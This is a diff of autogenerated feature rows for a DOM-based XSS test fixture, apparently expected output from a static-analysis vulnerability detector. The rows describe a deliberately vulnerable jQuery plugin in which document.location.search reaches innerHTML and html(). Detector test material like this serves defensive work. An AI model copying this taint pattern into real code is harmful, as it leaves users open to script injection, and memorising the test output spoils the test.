URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:23:359:23 | i | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:359:23:359:23 | i | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:23:359:23 | i | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:23:359:23 | i | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:359:26:359:26 | e | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:7 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:7 | this | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:7 | this | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:7 | this | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:7 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:17 | this.innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:17 | this.innerHTML | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:17 | this.innerHTML | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:17 | this.innerHTML | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:17 | this.innerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:26 | this.in ... target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:26 | this.in ... target | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:26 | this.in ... target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:26 | this.in ... target | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:360:4:360:26 | this.in ... target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:360:9:360:17 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:360:9:360:17 | innerHTML | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:360:9:360:17 | innerHTML | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:360:9:360:17 | innerHTML | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:360:9:360:17 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:360:21:360:26 | target | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:360:21:360:26 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:360:21:360:26 | target | contextSurroundingFunctionParameters | ()\n()\n(i, e) | | autogenerated/Xss/DomBasedXss/tst.js:360:21:360:26 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | | autogenerated/Xss/DomBasedXss/tst.js:360:21:360:26 | target | enclosingFunctionName | thisNodes | | autogenerated/Xss/DomBasedXss/tst.js:360:21:360:26 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:7 | this | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:7 | this | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:7 | this | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:7 | this | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:7 | this | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:12 | this.html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:12 | this.html | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:12 | this.html | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:12 | this.html | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:12 | this.html | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | exceptional return of this.html(target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | exceptional return of this.html(target) | contextSurroundingFunctionParameters | | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | exceptional return of this.html(target) | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | exceptional return of this.html(target) | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | exceptional return of this.html(target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | this.html(target) | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | this.html(target) | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | this.html(target) | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | this.html(target) | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:361:4:361:20 | this.html(target) | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:361:9:361:12 | html | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:361:9:361:12 | html | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:361:9:361:12 | html | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:361:9:361:12 | html | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:361:9:361:12 | html | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:361:14:361:19 | target | CalleeFlexibleAccessPath | this.html | | autogenerated/Xss/DomBasedXss/tst.js:361:14:361:19 | target | InputArgumentIndex | 0 | | autogenerated/Xss/DomBasedXss/tst.js:361:14:361:19 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | @@ -17339,12 +120601,163 @@ tokenFeatures | autogenerated/Xss/DomBasedXss/tst.js:361:14:361:19 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | | autogenerated/Xss/DomBasedXss/tst.js:361:14:361:19 | target | enclosingFunctionName | thisNodes | | autogenerated/Xss/DomBasedXss/tst.js:361:14:361:19 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:4 | e | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:4 | e | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:4 | e | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:4 | e | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:4 | e | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:14 | e.innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:14 | e.innerHTML | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:14 | e.innerHTML | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:14 | e.innerHTML | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:14 | e.innerHTML | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:23 | e.innerHTML = target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:23 | e.innerHTML = target | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:23 | e.innerHTML = target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:23 | e.innerHTML = target | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:363:4:363:23 | e.innerHTML = target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:363:6:363:14 | innerHTML | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:363:6:363:14 | innerHTML | contextSurroundingFunctionParameters | ()\n()\n(i, e) | +| autogenerated/Xss/DomBasedXss/tst.js:363:6:363:14 | innerHTML | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:363:6:363:14 | innerHTML | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:363:6:363:14 | innerHTML | fileImports | ansi-to-html | | autogenerated/Xss/DomBasedXss/tst.js:363:18:363:23 | target | assignedToPropName | innerHTML | | autogenerated/Xss/DomBasedXss/tst.js:363:18:363:23 | target | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | | autogenerated/Xss/DomBasedXss/tst.js:363:18:363:23 | target | contextSurroundingFunctionParameters | ()\n()\n(i, e) | | autogenerated/Xss/DomBasedXss/tst.js:363:18:363:23 | target | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | | autogenerated/Xss/DomBasedXss/tst.js:363:18:363:23 | target | enclosingFunctionName | thisNodes | | autogenerated/Xss/DomBasedXss/tst.js:363:18:363:23 | target | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:2 | $ | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:2 | $ | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:2 | $ | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:2 | $ | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:2 | $ | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:5 | $.fn | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:5 | $.fn | contextSurroundingFunctionParameters | () | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:5 | $.fn | enclosingFunctionBody | pluginName myFancyJQueryPlugin myPlugin target document location search html target innerHTML target each i e innerHTML target html target e innerHTML target $ fn pluginName myPlugin | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:5 | $.fn | enclosingFunctionName | thisNodes | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:5 | $.fn | fileImports | ansi-to-html | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:17 | $.fn[pluginName] | contextFunctionInterfaces | URLPseudoProperties()\nangularJSServices()\nansiToHTML()\nbar()\nbasicExceptions()\nbaz(x)\nchop(s)\nconstructor()\nconstructor(args)\nconstructor(props)\ndangerouslySetInnerHtml(s)\ndomMethods()\nflowThroughPropertyNames()\nfoo(target)\ngetTaintedUrl()\ngetUrl()\ngrowl()\nhandlebarsSafeString()\nhash()\nhash2()\njqueryLocation()\nlink(scope, element)\nmootools()\nmyPlugin()\nnonGlobalSanitizer()\nreact()\nreferences()\nrender()\ntest()\ntest()\ntest()\ntest()\ntest()\ntest2()\ntestCreateContextualFragment()\ntestDOMParser()\nthisNodes()\ntst()\nurlStuff()\nwindowName()\nwindowNameAssigned()\nwrap(s) | +| autogenerated/Xss/DomBasedXss/tst.js:366:2:366:17 | $.fn[pluginName] | contextSurroundingFunctionParameters | () | +| 